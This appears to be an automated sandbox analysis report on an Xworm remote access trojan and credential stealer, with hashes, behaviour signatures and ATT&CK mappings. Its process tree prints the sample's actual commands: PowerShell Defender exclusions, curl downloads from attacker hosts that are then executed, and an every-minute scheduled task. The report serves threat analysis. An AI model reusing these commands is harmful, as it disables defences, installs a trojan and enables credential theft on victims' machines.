Overview

overview

10

Static

static

3

srtware loader.exe

windows7-x64

8

srtware loader.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    47s
  • max time network
    49s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/11/2024, 19:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    srtware loader.exe

  • Size

    1.1MB

  • MD5

    12395d08dc0bfe12e63605328ddd982f

  • SHA1

    51ceb544e3900fb85fe7aada564d081219464d1d

  • SHA256

    789473143f4f1465f0221fca36ac25f48cae1223f51c9d6219544b27879ec3a6

  • SHA512

    1a26d4de93abf8f5af0b7e6ac3307f6cc6c3ce5b905545788430460c1664efa5637c856db3e994163147e259385da3125d6ff13a39bbade962c95872ea5bd4e4

  • SSDEEP

    24576:vTc28b2Yf2eSf1xZ9a9wwz+NzYbiaCoWTXKjvFQxf:bcbb2UCrZ9wwwKJL2jvFQx

Score
10/10
xwormcredential_accessdiscoveryexecutionpersistenceratspywarestealertrojan

Malware Config

Signatures

  • Detect Xworm Payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • .NET Reactor proctector 6 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\srtware loader.exe
    "C:\Users\Admin\AppData\Local\Temp\srtware loader.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1464
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1500
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c mkdir C:\Users\gbcd
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1752
    • C:\Windows\SysWOW64\curl.exe
      "curl.exe" -s http://79.110.49.246/didedba/abc -o C:\Users\gbcd\fff.scr
      2⤵
        PID:1316
      • C:\Windows\SysWOW64\curl.exe
        "curl.exe" -s http://79.110.49.246/didedba/dddv -o C:\Users\gbcd\qqq.scr
        2⤵
          PID:5048
        • C:\Windows\SysWOW64\curl.exe
          "curl.exe" -s http://79.110.49.246/didedba/write -o C:\Users\gbcd\ddd.scr
          2⤵
            PID:4488
          • C:\Windows\SysWOW64\curl.exe
            "curl.exe" -s https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\gbcd\srtware.exe
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1392
          • C:\Users\gbcd\fff.scr
            "C:\Users\gbcd\fff.scr"
            2⤵
            • Executes dropped EXE
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1188
          • C:\Users\gbcd\qqq.scr
            "C:\Users\gbcd\qqq.scr"
            2⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:3208
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3076
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qqq.scr'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1512
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4028
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winnotify.scr'
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:388
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr"
              3⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2972

        Network

        MITRE ATT&CK Enterprise v15

        Reconnaissance

        Resource Development

        Initial Access

        Execution

        Command and Scripting Interpreter

        1
        T1059

        PowerShell

        1
        T1059.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Persistence

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Privilege Escalation

        Boot or Logon Autostart Execution

        1
        T1547

        Registry Run Keys / Startup Folder

        1
        T1547.001

        Scheduled Task/Job

        1
        T1053

        Scheduled Task

        1
        T1053.005

        Defense Evasion

        Modify Registry

        1
        T1112

        Credential Access

        Credentials from Password Stores

        1
        T1555

        Credentials from Web Browsers

        1
        T1555.003

        Unsecured Credentials

        3
        T1552

        Credentials In Files

        3
        T1552.001

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        System Location Discovery

        1
        T1614

        System Language Discovery

        1
        T1614.001

        Lateral Movement

        Collection

        Data from Local System

        2
        T1005

        Command and Control

        Web Service

        1
        T1102

        Exfiltration

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          fc3f2e3336f15a67d2709d9c33d3a006

          SHA1

          fa1e687b195e9a4f3a6f7f6f3a168e2511fe231d

          SHA256

          b0f0ee241a8eaffc4da78d6a5eefb6e6701342a3f38b8571a9e62f9834120771

          SHA512

          6777ea135b93e1fa0ce1e383cd1db2f6975001b0c064c4b961ad57fef9aa15f8e102191c0a43d1c68732946e49067e5ef2178b052d2da8318494708d028880a9

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          3c8552a79d841b8439ad0dedb639c3e7

          SHA1

          dc5e504e8551b076de4fb8a3bf22d9d1275db8fc

          SHA256

          9bc36f696e489ddd7cd306a6d1022b82ef8507b3d659fecfe00662373aac4330

          SHA512

          d64a5ba836f356de46aeed6d9c632cbc75fa41bf69f868698b45e73126e35425bb857cfea1ec732f2dbfc228b6d5e3374f5f4237578cc90d64b5b487dae6ea4f

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          f326f80af25fe21562da9d48924971e1

          SHA1

          19afe302b9c6b31f653afdb62a2219465d8c1d19

          SHA256

          afdf942ee9c4cea2212b6fd43c7f72f49eef099c3713e6bd311fd705322957b4

          SHA512

          bcb72b344fffe4c284232453dc6a9c5218d05f6002657407ca8389db7eb1da8a053fc2727553c00a943e6308bdc7a99a252614b394ca2e58f27b2506d02e9cbe

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          18KB

          MD5

          d14b8dcacb34ddfc5e30865ac66f8f18

          SHA1

          46fcd129b3a6b0f9bec1c39e902770f894f61d5b

          SHA256

          a5fde4b66847333c13065c9a17ff801a73907a37a3f0f64d6b343139973b989c

          SHA512

          3902b7e251ea36f76812c1aad31fb5cfd686e857a7b65a1a6b178322ce3c31cf47190c6f0a9a75e264eff1bcef828c3f57eac1f84c88a2f9fc2258919e46a013

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wedmmi5f.juk.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\gbcd\fff.scr
          Filesize

          1.2MB

          MD5

          2a26ee4cbff061962a08e1e1ff21b2a3

          SHA1

          5d46e38be7aa3804036aeeea866ea779248620c0

          SHA256

          985b3985ac504754e2eb844272996a6a368e0bd732facdf096e522648d2db10a

          SHA512

          ae6e6273f209b95a6895ad28f208e46857178c80283cbb2d8fcfe30f52c921f36736b718807623cba969960a7ecd5547b9b53750f33a4ed25e4bc40eb15aead2

          Download Submit

        • C:\Users\gbcd\qqq.scr
          Filesize

          1.1MB

          MD5

          33300acb6fb3c7effae29a3eb133be2e

          SHA1

          5c906423479c8089be9c51ee2a015d6fb634a4b3

          SHA256

          f7b3c2421385d8169d382b108ebb542786bab4a622a73b039dc887e25682c952

          SHA512

          55a6e5253fe7b9df1c0788c34685d3f33289cd29bfa6a0cf99e0671dda0655dd885d0b93912e21eac5f16978cc02c33ff0849be8afffacdcae8f0a64a91049d3

          Download Submit

        • memory/388-159-0x00000000706B0000-0x00000000706FC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/1188-69-0x0000000000100000-0x00000000004CE000-memory.dmp

          Filesize

          3.8MB

          Download

        • memory/1188-66-0x0000000008C50000-0x00000000091F4000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/1188-64-0x0000000007050000-0x00000000070E2000-memory.dmp

          Filesize

          584KB

          Download

        • memory/1188-63-0x0000000000100000-0x00000000004CE000-memory.dmp

          Filesize

          3.8MB

          Download

        • memory/1188-62-0x0000000000100000-0x00000000004CE000-memory.dmp

          Filesize

          3.8MB

          Download

        • memory/1464-3-0x0000000006BA0000-0x0000000006BA6000-memory.dmp

          Filesize

          24KB

          Download

        • memory/1464-40-0x00000000749FE000-0x00000000749FF000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1464-2-0x00000000002C0000-0x0000000000652000-memory.dmp

          Filesize

          3.6MB

          Download

        • memory/1464-24-0x00000000002C0000-0x0000000000652000-memory.dmp

          Filesize

          3.6MB

          Download

        • memory/1464-1-0x00000000749FE000-0x00000000749FF000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1464-0-0x00000000002C0000-0x0000000000652000-memory.dmp

          Filesize

          3.6MB

          Download

        • memory/1500-47-0x0000000007AC0000-0x0000000007ACE000-memory.dmp

          Filesize

          56KB

          Download

        • memory/1500-9-0x0000000005E80000-0x0000000005EE6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1500-37-0x0000000007540000-0x00000000075E3000-memory.dmp

          Filesize

          652KB

          Download

        • memory/1500-39-0x00000000749F0000-0x00000000751A0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1500-41-0x0000000007FA0000-0x000000000861A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/1500-42-0x0000000007680000-0x000000000769A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/1500-43-0x00000000749F0000-0x00000000751A0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1500-44-0x00000000076F0000-0x00000000076FA000-memory.dmp

          Filesize

          40KB

          Download

        • memory/1500-45-0x0000000007B10000-0x0000000007BA6000-memory.dmp

          Filesize

          600KB

          Download

        • memory/1500-46-0x0000000007A90000-0x0000000007AA1000-memory.dmp

          Filesize

          68KB

          Download

        • memory/1500-36-0x0000000006B30000-0x0000000006B4E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/1500-48-0x0000000007AD0000-0x0000000007AE4000-memory.dmp

          Filesize

          80KB

          Download

        • memory/1500-49-0x0000000007BD0000-0x0000000007BEA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/1500-50-0x0000000007BB0000-0x0000000007BB8000-memory.dmp

          Filesize

          32KB

          Download

        • memory/1500-53-0x00000000749F0000-0x00000000751A0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1500-25-0x0000000006B50000-0x0000000006B82000-memory.dmp

          Filesize

          200KB

          Download

        • memory/1500-26-0x0000000070E50000-0x0000000070E9C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/1500-23-0x00000000065A0000-0x00000000065EC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/1500-22-0x0000000006560000-0x000000000657E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/1500-21-0x0000000005F60000-0x00000000062B4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/1500-11-0x00000000749F0000-0x00000000751A0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1500-38-0x00000000749F0000-0x00000000751A0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1500-4-0x0000000002FE0000-0x0000000003016000-memory.dmp

          Filesize

          216KB

          Download

        • memory/1500-6-0x0000000005760000-0x0000000005D88000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/1500-5-0x00000000749F0000-0x00000000751A0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1500-7-0x00000000749F0000-0x00000000751A0000-memory.dmp

          Filesize

          7.7MB

          Download

        • memory/1500-8-0x00000000056B0000-0x00000000056D2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/1500-10-0x0000000005EF0000-0x0000000005F56000-memory.dmp

          Filesize

          408KB

          Download

        • memory/1512-114-0x0000000006470000-0x00000000067C4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/1512-117-0x00000000706B0000-0x00000000706FC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/3076-91-0x00000000706B0000-0x00000000706FC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/3076-79-0x0000000006120000-0x0000000006474000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/3076-101-0x0000000007A40000-0x0000000007AE3000-memory.dmp

          Filesize

          652KB

          Download

        • memory/3076-102-0x0000000007BB0000-0x0000000007BC1000-memory.dmp

          Filesize

          68KB

          Download

        • memory/3076-103-0x0000000007D40000-0x0000000007D54000-memory.dmp

          Filesize

          80KB

          Download

        • memory/3076-90-0x00000000067F0000-0x000000000683C000-memory.dmp

          Filesize

          304KB

          Download

        • memory/3208-74-0x0000000000AF0000-0x0000000000EA2000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/3208-77-0x0000000009870000-0x000000000990C000-memory.dmp

          Filesize

          624KB

          Download

        • memory/3208-75-0x0000000000AF0000-0x0000000000EA2000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/3208-76-0x00000000072D0000-0x00000000072D6000-memory.dmp

          Filesize

          24KB

          Download

        • memory/3208-72-0x0000000000AF0000-0x0000000000EA2000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/3208-170-0x0000000000AF0000-0x0000000000EA2000-memory.dmp

          Filesize

          3.7MB

          Download

        • memory/4028-138-0x00000000706B0000-0x00000000706FC000-memory.dmp

          Filesize

          304KB

          Download